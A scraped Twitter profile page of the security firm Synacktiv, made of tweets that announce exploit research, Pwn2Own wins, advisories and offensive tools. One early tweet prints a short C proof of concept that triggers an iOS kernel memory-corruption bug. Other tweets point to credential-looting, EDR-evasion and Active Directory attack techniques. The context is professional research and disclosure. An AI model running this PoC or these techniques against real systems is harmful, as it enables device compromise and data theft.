Synacktiv @Synacktiv Twitter profile

Last Seen Profiles

@ao_stharia

@bokeplokalmalam

@alimehri2024

@zurpleofficial

@actlikethat

@NooNid78996591

@JB863354839892

@weDignify

@NoMvpa

@DeBoardLandyn

@HDickinsonDaily

@Ale_P0

@alex_in_nc

@listen2screams

@PaulMJackson9

@moiseschiu

@AddisonOne44628

@JDCo

@Jimbomcc69

@sr8oo_o

@ArisadaMar61674

@TailsGaming

@bfavmedic_2

@bbo_esg_ssg

@tahibiji

@vsuspod

@4xayvion

@BridgetE53138

@kosukosu0309

@beafandraw

@kponiat83

@stw_pdg

@Mark_Chorlton

@bokeplokalmalam

@cnnturkkurumsal

@CoachCoopp

Synacktiv

@Synacktiv

2 years

The PoC is even tweetable ;) void *C(void* a){thread_set_exception_ports(mach_thread_self(),EXC_MASK_ALL,*(int *)a,2,6);__builtin_trap();return a;} int main(){int p=mk_timer_create();mach_port_insert_right(mach_task_self(),p,p,20);pthread_t t;pthread_create(&t,0,C,&p);for(;;);}

John Aakerblom

@jaakerblom

2 years

iOS 15.4 fixes a kernel vulnerability introduced in iOS 15.0 beta that causes corruption of ipc_kmsgs leading to powerful primitives that can be used for local privilege escalation from WebContent and app sandbox

15

77

412

22

187

683

Synacktiv

@Synacktiv

9 months

To facilitate reverse-engineering of large programs, vulnerability research and root-cause analysis on iOS, Android, and other major platforms, @myr463 and @Hexabeast released Frinet, a tool combining Frida with an enhanced version of Tenet.

Frinet: reverse-engineering made easier

www.synacktiv.com

2

177

460

Synacktiv

@Synacktiv

3 years

Lazy to write payloads in @Burp_Suite ? HopLa adds autocompletion support and a custom payload library! 🤠 cc @alexisdanizan

3

200

494

Synacktiv

@Synacktiv

4 years

This is for the Pwners: exploiting a WebKit 0-day in PlayStation 4! We are happy to announce that @0xdagger and @abu_y0ussef will present their work on breaking the PS4 at #BHEU @BlackHatEvents !

7

136

454

Synacktiv

@Synacktiv

2 years

If you see two guys wearing Synacktiv t-shirts with big antennas, you should turn around with your @Tesla ! 0-click RCE demonstration on a real vehicle, with CAN messages sent to switch on headlights, wipers and trunk 😎 #Pwn2Own

6

132

434

Synacktiv

@Synacktiv

4 years

Since MSRC just published a fix for CVE-2020-0796, here's @_lucas_georges_ quick and dirty root cause analysis on it: #sambadijaneiro

I'm SMBGhost, daba dee daba da

This blogpost was created due to a mistake from Microsoft, releasing publicly an advance warning for CVE-2020-0796.

www.synacktiv.com

7

249

388

Synacktiv

@Synacktiv

4 years

As no details are available yet, our expert @0xf4b started investigating one of the three iOS vulnerabilities that are exploited in the wild and fixed by version 14.2. You can read the story in our latest blogpost!

7

152

380

Synacktiv

@Synacktiv

4 years

We are in 2021 and SFTP access will never grant you a PTY. But you may still be able to use it to forward data to local ports, remote ports and to Unix domain sockets. A Remote Code Execution is then never far away! #synacktips

2

116

361

Synacktiv

@Synacktiv

2 years

Ninjas are getting ready for #P2OVancouver 💪 #Pwn2Own

3

62

346

Synacktiv

@Synacktiv

2 years

Watchout! CVE-2023-22809 on Sudo was patched today to prevent a privilege escalation on sudoedit. Read the security advisory by @aevy__ and @v1csec :

7

161

312

Synacktiv

@Synacktiv

8 months

Here we are! 🥷 Masters of pwn for the third time 🎉 Congratulations to all the ninjas involved! #Pwn2Own

19

52

342

Synacktiv

@Synacktiv

1 year

After having finished their exploit in an hotel room, @_p0ly_ and @vdehors successfully compromised the Tesla Model 3 infotainment through bluetooth and elevated their privileges to root! Combined with the previous entry, this could have been a full chain to take over the car!

Zero Day Initiative

@thezdi

1 year

👀👀👀👀👀

1

18

91

14

81

274

Synacktiv

@Synacktiv

4 years

Return of the iOS sandbox escape: lightspeed's back in the race!! The XNU bug @JohnCool__ described last year was reintroduced and is still exploitable in the last version of iOS, as shown by @unc0verTeam :

5

145

328

Synacktiv

@Synacktiv

8 months

Have you ever wondered what the attack surface of Counter Strike: Global Offensive looks like? Our ninjas @myr463 and @v1csec studied it and found a server to client bug! Read more details about this research in our latest blogpost.

Exploring Counter-Strike: Global Offensive Attack Surface

www.synacktiv.com

2

110

305

Synacktiv

@Synacktiv

1 year

Sometimes simple is best. See how @SidewayRE exploited a 9-year-old Linux kernel bug at #Pwn2Own Vancouver 2023!

Old bug, shallow bug: Exploiting Ubuntu at Pwn2Own Vancouver 2023

www.synacktiv.com

2

93

189

Synacktiv

@Synacktiv

2 years

After many days (and nights!) of hard work, we're really proud to see @_p0ly_ and @vdehors target the @Tesla Model 3 at #Pwn2Own ! Draw will take place on Tuesday, send us all your good vibes 💪

5

62

257

Synacktiv

@Synacktiv

1 year

During a recent Active Directory intrusion test, @croco_byte was led to devise a new versatile attack vector targeting Group Policy Objects, allowing their exploitation through NTLM relaying.

GPOddity: exploiting Active Directory GPOs through NTLM relaying, and more!

www.synacktiv.com

6

110

252

Synacktiv

@Synacktiv

4 years

You wana race the iOS kernel? Here is our take on CVE-2021-1782 where @JohnCool__ explains the LPE vulnerability patched in 14.3:

Analysis and exploitation of the iOS kernel vulnerability CVE-2021-1782

Two weeks ago, CVE-2021-1782 was fixed by Apple.

www.synacktiv.com

5

102

230

Synacktiv

@Synacktiv

1 year

Beside LSASS, are you sure to loot every available secrets on your compromised Windows host? In our latest blogpost, @l4x4 summarizes the techniques and tools to ensure you do not miss any:

Windows secrets extraction: a summary

www.synacktiv.com

2

83

237

Synacktiv

@Synacktiv

4 years

Despite an active console hacking community, only few public PS4 exploits have been released. Our experts @abu_y0ussef and @0xdagger gave a talk at #BlackHat Europe on the exploitation of a 0-day browser vulnerability.

8

98

223

Synacktiv

@Synacktiv

4 years

With iOS 13.5.1, Apple killed LightSpeed/ @unc0verTeam ... but Anakin may still crash your iPhone with a racy memleak! More info in our follow up blogpost:

The fix for CVE-2020-9859 and the lightspeed vulnerability

Last week we published about the reintroduction of a kernel vulnerability in iOS 13.

www.synacktiv.com

8

74

221

Synacktiv

@Synacktiv

3 years

Interested in macOS/iOS XPC exploitation? @elvanderb just published a detailed solution to @allesctf 🔥Sandbox Share challenge with a reliable exploit!

macOS XPC Exploitation - Sandbox Share case study

Usually we don't do blog posts about CTF challenges but we recently stumbled across a challenge that was a good opportunity to talk about several macOS/iOS internals, security mechanisms and exploit m

www.synacktiv.com

1

86

223

Synacktiv

@Synacktiv

2 years

Ever wanted to exploit a PHP file inclusion without having a file upload? Follow @_remsio_ 's journey to discover PHP filter chains, ensuring they work properly, and transforming them into a tool. You can now convert almost any file inclusion to RCE!

PHP filters chain: What is it and how to use it

Searching for new gadget chains to exploit deserialization vulnerabilities can be tedious.

www.synacktiv.com

1

95

224

Synacktiv

@Synacktiv

5 months

Explore new ways to easily perform DLL Hijacking for lateral movement using DCOM with our new tool DLHell by @k3vinTell now available on Github!

GitHub - synacktiv/DLHell: Local & remote Windows DLL Proxying

Local & remote Windows DLL Proxying. Contribute to synacktiv/DLHell development by creating an account on GitHub.

github.com

0

61

225

Synacktiv

@Synacktiv

4 years

We've just presented at @sstic how a 1-day vulnerability in Samsung Trustzone can be used to rewrite the Shannon baseband memory and install a debugger on a Galaxy S7 phone. The PDF 🇬🇧 and talk 🇫🇷 are here: The tools are here:

0

121

208

Synacktiv

@Synacktiv

1 year

After #Pwn2Own Austin in 2021, we are once again Masters of Pwn at #P2OVancouver ! Huge congratulations to the team 🥷, it was amazing!

Zero Day Initiative

@thezdi

1 year

That’s a wrap for #P2OVancouver ! Contestants disclosed 27 unique 0-days and won a combined $1,035,000 (and a car)! Congratulations to the Masters of Pwn, @Synacktiv , for their huge success and hard work! They earned 53 points, $530,000, and a Tesla Model 3. #Pwn2Own

4

49

214

13

22

202

Synacktiv

@Synacktiv

10 months

Unlock the Global Admin access 🏆 on Azure with this pentesting mindmap made by @alexisdanizan !

0

76

200

Synacktiv

@Synacktiv

4 years

We've just presented at @sstic a new exploitation technique using a heap overflow in Windows 10 Kernel Pool. The PDF 🇬🇧 and talk 🇫🇷 are here: The code of the exploit is here:

GitHub - synacktiv/Windows-kernel-SegmentHeap-Aligned-Chunk-Confusion: PoC exploiting Aligned Chunk...

PoC exploiting Aligned Chunk Confusion on Windows kernel Segment Heap - synacktiv/Windows-kernel-SegmentHeap-Aligned-Chunk-Confusion

github.com

0

104

199

Synacktiv

@Synacktiv

1 year

Have you ever wanted to extract, decode and decrypt all NTDS.dit data? We are glad to share with you a new tool: ntdissector by @kalimer0x00 and @Julien_Legras , powered by the awesome lib dissect.esedb from @foxit ! More info in the blogpost:

Introducing ntdissector, a swiss army knife for your NTDS.dit files

www.synacktiv.com

1

76

196

Synacktiv

@Synacktiv

3 years

We did it 😃! What a blast to be part of a team able to claim the title of Master of Pwn! Kudos to all other participants and to @thezdi for the flawless organization. Let’s wait for the patches, then we’ll share the technical details with the community 🤙

Zero Day Initiative

@thezdi

3 years

Here are the final Master of Pwn standings. Congrats to @Synacktiv on claiming the title. It was a close race, but they pull through.

2

39

132

7

36

192

Synacktiv

@Synacktiv

4 years

A nice addition to our blogpost, #BlackHat has released the slides of @abu_y0ussef and @0xdagger "This is for the pwners - exploiting a webkit 0-day in Playstation 4"

1

55

180

Synacktiv

@Synacktiv

8 months

Our ninja @masthoon solved a tough challenge during @PotluckCTF with an ingenious approach: he built a decompiler for a custom ISA by lifting instructions to Binary Ninja IL. Read the "Pot of Gold" write-up (kudos to @bl4sty for creating the challenge):

Leveraging Binary Ninja IL to Reverse a Custom ISA: Cracking the “Pot of Gold” 37C3

www.synacktiv.com

1

59

182

Synacktiv

@Synacktiv

4 years

Are you a Red Teamer 3.0 trying to attack Azure Active Directory? Check out the latest blog post from @bak_sec describing its attack paths: Of course, we advise you to read it as well if you're in the Blue Team!

2

86

176

Synacktiv

@Synacktiv

4 years

Have you ever struggled with missing symbols while reversing a .NET native application such as UWP? Have a look at .NIET, our new IDA Pro plugin! cc @HexRaysSA

2

71

177

Synacktiv

@Synacktiv

8 months

Our ninja @_Worty identified a remote code execution from a privileged user in Cisco Access Point WAP371. This vulnerability referenced as CVE-2024-20287 will not be patched, apply network restrictions to protect your appliances.

Remote Code Execution on Cisco Access Point WAP371 firmware ≤ 1.3.0.7

Remote Code Execution on Cisco Access Point WAP371 firmware ≤ 1.

www.synacktiv.com

7

37

173

Synacktiv

@Synacktiv

1 year

For the 2nd time, our Ninjas @abu_y0ussef , @netsecurity1 and @cleptho targeted the Canon printer 🖨️ during Pwn2Own Toronto. In this blogpost, you will discover how they achieved code execution, together with a PoC.

The printer goes brrrrr, again!

www.synacktiv.com

0

59

93

Synacktiv

@Synacktiv

5 months

In our latest blogpost, @croco_byte presents an often overlooked AD attack surface related to OUs ACLs,with the release of a dedicated exploitation tool, ().

OUned.py: exploiting hidden Organizational Units ACL attack vectors in Active Directory

www.synacktiv.com

1

85

170

Synacktiv

@Synacktiv

1 year

Excellent start for the team! @_p0ly_ and @vdehors fully compromised the Tesla Model 3 gateway from the ethernet network 💪 We should book a new parking space now...

Zero Day Initiative

@thezdi

1 year

CONFIRMED! @Synacktiv successfully executed a TOCTOU exploit against Tesla – Gateway. They earn $100,000 as well as 10 Master of Pwn points and this Tesla Model 3. #Pwn2Own #P2OVancouver

17

139

616

3

50

168

Synacktiv

@Synacktiv

5 years

We've released our advisories regarding a bunch of pre-authenticated issues in GLPI: 1) SQLi -> 2) Type juggling -> 3) Timing attack -> 4) Arbitrary call ->

2

101

161

Synacktiv

@Synacktiv

4 years

🥷 #Pwn2Own Tokyo. DMA attack as a first step of our security research on the Sonos One smart speaker. In order to dump the firmware. Find the detailed blogpost by @_p0ly_ 🤩

3

60

167

Synacktiv

@Synacktiv

2 years

Finding #Java gadgets chains has never been so easy with the help of #CodeQL . Checkout our latest article, in which @hugow_vincent demonstrates a new technique to leverage the power of CodeQL to find new gadgets: QLinspector:

3

64

165

Synacktiv

@Synacktiv

4 months

We finally got the first place during #HackTheBox #BusinessCTF24 ! Congratulations to all ninjas 🥳

5

13

161

Synacktiv

@Synacktiv

3 years

Are you into Linux exploitation? Read how @vdehors found and exploited a Local Privilege Escalation on Ubuntu Linux during @thezdi #Pwn2Own 2021, using a bug in the shiftFS filesystem driver.

0

82

160

Synacktiv

@Synacktiv

2 years

Our ninjas @yaumn_ and @mickaelweb recently assessed Microsoft Defender for Identity detection capabilities. In their recent blogpost, they describe the product's architecture, present some bypasses and give general Red Team advices.

A dive into Microsoft Defender for Identity

www.synacktiv.com

3

68

161

Synacktiv

@Synacktiv

5 years

An IDA script to extract RPC interfaces from binaries: findrpc by our team member @_lucas_georges_ cc @tiraniddo

GitHub - lucasg/findrpc: Idapython script to carve binary for internal RPC structures

Idapython script to carve binary for internal RPC structures - lucasg/findrpc

github.com

4

91

157

Synacktiv

@Synacktiv

2 years

Always wanted to proxy traffic through a Citrix connection? Following @hugoclout presentation at @sstic , we just released Ica2Tcp!

GitHub - synacktiv/ica2tcp: A SOCKS proxy for Citrix.

A SOCKS proxy for Citrix. Contribute to synacktiv/ica2tcp development by creating an account on GitHub.

github.com

2

78

156

Synacktiv

@Synacktiv

4 years

The slides of the talk "Speedpwning VMware Workstation" by @BrunoPujos and @OnlyTheDuck are available! Check them out if you missed their talk at @ekoparty 2020!

2

55

155

Synacktiv

@Synacktiv

4 years

We've spotted an interesting feature in the Samsung DSP driver on Galaxy S20/S21: untrusted Android apps can load custom firmware on the chip... See how this feature can lead to arbitrary kernel write on our latest blogpost:

0

69

152

Synacktiv

@Synacktiv

5 months

Interested in finding and exploiting vulnerabilities in old video games? If so, you'll love our latest blogpost on American Conquest by @tomtombinary !

Exploiting American Conquest

www.synacktiv.com

2

46

152

Synacktiv

@Synacktiv

4 years

#Pwn2Own Tokyo 2020. This blogpost explains the details of our CVE-2021-27246, a remote code execution on TP-Link AC1750 Smart Wifi Router. Exploit, wait, and get root!

0

61

151

Synacktiv

@Synacktiv

6 years

Slides for @elvanderb presentation "macOS: how to gain root with CVE-2018-4193 in < 10s" @offensive_con are available!

Resources

Synacktiv

www.synacktiv.com

2

115

145

Synacktiv

@Synacktiv

10 days

We just rewrote the AsOutsider part of #AADInternals in Python to enhance compatibility and ease of use in Linux environments. You can find it here:

GitHub - synacktiv/AADOutsider-py: Python3 rewrite of AsOutsider features of AADInternals

Python3 rewrite of AsOutsider features of AADInternals - synacktiv/AADOutsider-py

github.com

2

43

149

Synacktiv

@Synacktiv

3 years

During a security assessment, our team found an insecure deserialisation of PHAR archives in the Html2Pdf library <= 5.2.3. It could allow remote attackers able to input arbitrary HTML content to gain remote code execution on the server.

0

45

146

Synacktiv

@Synacktiv

3 years

Takeover an entire domain by resetting passwords! We detailed how to exploit CVE-2021-40539 on ManageEngine ADSelfService Plus in this blogpost @acervoise - @tiyeuse

How to exploit CVE-2021-40539 on ManageEngine ADSelfService Plus

During a penetration test we encountered the ManageEngine ADSelfService Plus (ADSS) solution.

www.synacktiv.com

0

60

148

Synacktiv

@Synacktiv

6 years

- Dear Santa 🎅, I wish I could link #PCILeech and HP iLO to compromise running hosts via #DMA - You've been a good boy: cc @UlfFrisk

Using your BMC as a DMA device: plugging PCILeech to HPE iLO 4

This blogpost aims at describing a method to turn a vulnerable HP iLO 4 instance into a DMA-capable device with the associated connector for PCILeech, the reference tool for memory acquisition and man

www.synacktiv.com

2

121

145

Synacktiv

@Synacktiv

2 months

In their latest blogpost, @hugow_vincent and @loadlow developed in-memory post-exploitation payloads to inject and hook common Java applications. Come and see the Java shenanigans involved to interact with the apps from the inside!

Injecting Java in-memory payloads for post-exploitation

www.synacktiv.com

2

53

147

Synacktiv

@Synacktiv

1 year

Ever wanted to understand PHP concepts in depth? This series of 2 articles by @_remsio_ details a POP chain targeting the doctrine/doctrine-bundle package. In this first one, we aim to show a full methodology of POP chain research. Stay tuned for part 2!

Finding a POP chain on a common Symfony bundle: part 1

www.synacktiv.com

0

48

146

Synacktiv

@Synacktiv

3 years

Master of Pwn received! Thank you @thezdi 😄

1

20

145

Synacktiv

@Synacktiv

6 years

New technical write-up by @Fist0urs on how to perform a DMA attack against a Windows 10 workstation (TPM-only BitLocker)

4

154

142

Synacktiv

@Synacktiv

8 months

Things are going pretty well so far 🚗 #Pwn2Own

4

22

140

Synacktiv

@Synacktiv

1 year

In no time, the mighty @elvanderb pwned his favorite target: XNU, the Apple MacOS kernel! Rumor has it that he took more time developing the ASCII art than the actual exploit 🥷 #P2OVancouver

Zero Day Initiative

@thezdi

1 year

Success! @Synacktiv used a TOCTOU bug to escalate privileges on Apple macOS. They earn $40,000 and 4 Master of Pwn points. #Pwn2Own #P2OVancouver

1

41

245

0

25

142

Synacktiv

@Synacktiv

1 year

Due to the incredible bug chain used for this entry, ZDI decided it qualified for the first ever Tier2 in #Pwn2Own ! Huge congratz @_p0ly_ and @vdehors 💪 #P2OVancouver

Zero Day Initiative

@thezdi

1 year

CONFIRMED! @Synacktiv used a heap overflow & an OOB write to exploit the Infotainment system on the Tesla. When they gave us the details, we determined they actually qualified for a Tier 2 award! They win $250,000 and 25 Master of Pwn points. 1st ever Tier 2 award. Stellar work!

7

121

490

4

26

139

Synacktiv

@Synacktiv

1 year

Did you enjoy the latest blogpost on PHP filter chains? Well, our ninja @_remsio_ strikes again with a new article detailing how you can abuse them to leak files from the targeted system, as well as a freshly developed tool to exploit it!

PHP filter chains: file read from error-based oracle

www.synacktiv.com

2

67

141

Synacktiv

@Synacktiv

2 years

If you enjoy sailing the sea, beware! @MajorTomSec has found a critical security vulnerability in @RaftSurvivaGame , allowing 0-click RCE on any online player. The vendor has remained silent for 5 months, so here are the details:

8

62

140

Synacktiv

@Synacktiv

4 years

Are you getting bored at home? Our last Windows 10 use-after-free kernel exploitation challenge is publicly available on @rootme_org :

1

51

139

Synacktiv

@Synacktiv

7 years

Partial eclipse of Juniper today! Decrypt ScreenOS passwords and keys 😎

3

105

135

Synacktiv

@Synacktiv

6 months

Ever faced a WAF/EDR while exploiting a Java deserialization? Checkout our latest blogpost by @loadlow for a stealthier exploitation, exfiltration and persistence by diving deep into translets, transformers and more!

Java deserialization tricks

www.synacktiv.com

0

55

135

Synacktiv

@Synacktiv

6 years

iOS12 Kernelcache laundering: adding PAC instructions and kernelcache relocations support to IDA via IDAPython

1

71

132

Synacktiv

@Synacktiv

25 days

In our latest blogpost, @croco_byte explores the inner workings of SCCM policies and introduces , a tool targeting secret policies in order to exploit misconfigurations, harvest credentials, and pivot across collections by impersonating legitimate clients.

0

56

133

Synacktiv

@Synacktiv

1 year

📱Dive into the inner workings of jemalloc new: one of the libc allocators used on modern #Android devices. Enhance your understanding of memory management with @iksocin !

Exploring Android Heap allocations in jemalloc 'new'

When writing an exploit for a memory corruption vulnerability, knowing the heap allocator internals is often required to shape the heap as desired. This article will dive into one of Android libc allo

www.synacktiv.com

1

62

128

Synacktiv

@Synacktiv

2 years

Cool vulnerabilities don't last long! Netgear killed two of our entries with a last minute patch before #Pwn2Own !

Cool vulns don't live long - Netgear and Pwn2Own

Pwn2own is a competition where hackers try to execute arbitrary code on selected devices.

www.synacktiv.com

6

37

121

Synacktiv

@Synacktiv

6 years

From sandbox to kernel: iOS/macOS 0-day^w48-hours by @elvanderb at @BeeRumP_Paris #RageDisclosurePolicy

3

72

121

Synacktiv

@Synacktiv

4 years

First action when testing Symfony applications is to search app_dev.php. This dev feature is so powerful that we've released to exploit it. It's often restricted to localhost, but HTTP_CLIENT_IP, X-FORWARDED-FOR or a nice SSRF may help 😃

GitHub - synacktiv/eos: Enemies Of Symfony - Debug mode Symfony looter

Enemies Of Symfony - Debug mode Symfony looter. Contribute to synacktiv/eos development by creating an account on GitHub.

github.com

0

52

122

Synacktiv

@Synacktiv

4 years

Have you ever tried to exploit CVE-2020-16952 (SSI on SharePoint by @steventseeley ) and failed with “Unknown server tag 'WebPartPages:DataFormWebPart'”? Well, just register the tag before using it! #synacktivtips

0

29

118

Synacktiv

@Synacktiv

4 months

In his latest blogpost, @yaumn_ analyzes MDI's detection of PKINIT authentication, explains how to bypass it and releases Invoke-RunAsWithCert, a tool to perform Kerberos authentication via PKINIT with the Windows API from a non domain-joined machine.

Understanding and evading Microsoft Defender for Identity PKINIT detection

www.synacktiv.com

1

46

121

Synacktiv

@Synacktiv

4 months

Want to know how deleted photos reappeared in iOS 17.5? Check out today's blogpost by @Lefnui 🍎

Inside the iOS bug that made deleted photos reappear

www.synacktiv.com

1

37

120

Synacktiv

@Synacktiv

5 years

"Hey la Kibana, Inspection des gadgets !" 😋 Pwning Kibana 6.2 using prototype pollution and CVE-2018-17246 by @_mabote_

3

65

116

Synacktiv

@Synacktiv

4 years

Always scan for open proxies with nmap http-open-proxy script, to hit internal services and make your friend’s blind SSRF look really superfluous… #synacktips

0

29

116

Synacktiv

@Synacktiv

4 years

Our team targeted VMware Workstation with a guest-to-host escape during #Pwn2Own While we couldn't demonstrate the exploit in the allotted time, @thezdi find the vulnerability to be valid and purchased it 👏 Details in 120 days when fixed by @VMware !

Zero Day Initiative — Pwn2Own Day Two – Results and Master of Pwn

The final day of Pwn2Own 2020 came to a close yesterday, but not before a bit of drama, intrigue, and more great research. We saw two successful attempts, which resulted in four new bugs earning...

www.zerodayinitiative.com

2

31

114

Synacktiv

@Synacktiv

4 months

Sometimes, the obstination of our Linux fans leads to interesting findings on iOS USB networking. Have a look at our latest blogpost by @flogallium

iOS: a journey in the USB networking stack

www.synacktiv.com

1

36

117

Synacktiv

@Synacktiv

2 years

FreeBSD just published a security advisory about a vulnerability we discovered in bhyve. @abu_y0ussef will present in an upcoming conference how he turned it into a VM escape!

2

43

114

Synacktiv

@Synacktiv

4 years

Have you ever wondered how the IDA Lumina feature works, what kind of data is sent, and wished for a local server under your control? @_johan_b_ wrote a blog post to answer these questions: An offline server is also available:

1

57

114

Synacktiv

@Synacktiv

6 years

Patch your Packet Filter: OpenBSD & FreeBSD remote DoS in 2 IPv6 packets. Please don't fragment the Internet" #CVE -2019-5597

3

93

113

Synacktiv

@Synacktiv

8 months

Only a few days until #Pwn2Own Automotive in Tokyo. Our ninjas will bring some interesting entries with them ;)

5

18

110

Synacktiv

@Synacktiv

7 years

RCE vulnerability in HP iLO, it's time to patch before the release of additional details:

8

142

109

Synacktiv

@Synacktiv

9 months

Bored of managing multiple proxychains configurations? @hugoclout developed bbs, a swiss army knife proxy manager for red teamers! The project is available on our GitHub:

GitHub - synacktiv/bbs: bbs is a router for SOCKS and HTTP proxies. It exposes a SOCKS5 (or HTTP...

bbs is a router for SOCKS and HTTP proxies. It exposes a SOCKS5 (or HTTP CONNECT) service and forwards incoming requests to proxies or chains of proxies based on the request's target. Routi...

github.com

3

41

112

Synacktiv

@Synacktiv

3 years

Exploit and firmware decryption script for Samsung Q60T TV presented at @GrehackConf by @Karion_ and @tlk___ has been pushed on Github! Check this out:

GitHub - synacktiv/samsung-q60t-exploit

Contribute to synacktiv/samsung-q60t-exploit development by creating an account on GitHub.

github.com

1

37

110

Synacktiv

@Synacktiv

3 years

W^X, ALSR, seccomp, cfi, PAC, *Guard... binary exploitation is harder and harder... But most consumer grade devices are stuck in the 90's when it comes to embedded security, so let's have fun with a #pwn2own target:

Your vulnerability is in another OEM!

Among targets for the Pwn2own Tokyo 2020 was 2 NAS, the Synology DiskStation DS418play and Western Digital My Cloud Pro PR4100.

www.synacktiv.com

0

34

110

Synacktiv

@Synacktiv

10 months

Unable to extract your firmware to find vulnerabilities? Voltage glitching might be the solution. Dive in with @___t0___ to see how it could be useful!

How to voltage fault injection

www.synacktiv.com

0

32

107

Synacktiv

@Synacktiv

3 years

Looks like we’ll bring back the trophy to France 🇫🇷 this year! 😁🙏🍀

4

24

106

Synacktiv

@Synacktiv

3 years

First part of a summer serie on writing your own symbolic execution engine, from scratch, complete with SMT solving, and, for a change, not in Python :) By the legendary @bartavelle

1

41

105

Synacktiv

@Synacktiv

4 years

Obviously, cryptography can't protect you from everything, such as arbitrary code execution... especially when you leak the private key. This is the story of a Typo3 CMS RCE by @hugow_vincent

3

36

106

Synacktiv

@Synacktiv

1 year

Rare are the pentesters who have never come across an up-to-date CMS installation during a 3 days audit, wondering what to do next. We are starting a blogpost series covering CMSs and web frameworks internals, with two articles by @_bluesheet

Web Architect - An Introduction

www.synacktiv.com

1

28

104

Synacktiv

@Synacktiv

6 years

Fifty shades of UEFI: an initiation to SMM practices

Code Check(mate) in SMM

In this article, a bypass of the SMM_CODE_CHK_EN, the equivalent of the SMEP protection for the System Management Mode (SMM), protection is explained. This article first explain the protection and the

www.synacktiv.com

1

84

104

Synacktiv

@Synacktiv

6 years

Kick-start your code obfuscation techniques

0

79

101

Synacktiv

@Synacktiv

1 year

Have you ever have come across a device implementing U-Boot? Didn't know where to start? In our latest blogpost, @___t0___ explains why you should definitely dive into it:

I hack, U-Boot

During hardware assessments, it is common to come across devices implementing U-Boot.

www.synacktiv.com

1

32

102

Synacktiv

@Synacktiv

8 months

During a security assessment, our ninja @l4x4 identified multiple vulnerabilities on Cisco UCM allowing to gain code execution, escalating privileges to root and then escaping the SELinux context. Patch asap and read the details here:

0

30

104

Synacktiv

@Synacktiv

2 years

Let the bees out! Escaping from the bhyve hypervisor by @abu_y0ussef 🐝

Escaping from bhyve

Bhyve is a hypervisor for FreeBSD.

www.synacktiv.com

1

42

100

Synacktiv

@Synacktiv

4 months

Last week, Microsoft released a patch for CVE-2024-26238, a Windows 10 LPE reported by @yaumn_ . You can read the advisory here:

Windows 10 PLUGScheduler Elevation of Privilege

www.synacktiv.com

1

41

103

Synacktiv

@Synacktiv

11 months

During an audit, @us3r777 and @_remsio_ found a vulnerability in Geoserver WMS. They leveraged an SSRF and a CRLF injection to target a Redis server and obtain RCE!

Unauthenticated Server Side Request Forgery & CRLF injection in Geoserver WMS

www.synacktiv.com

0

21

101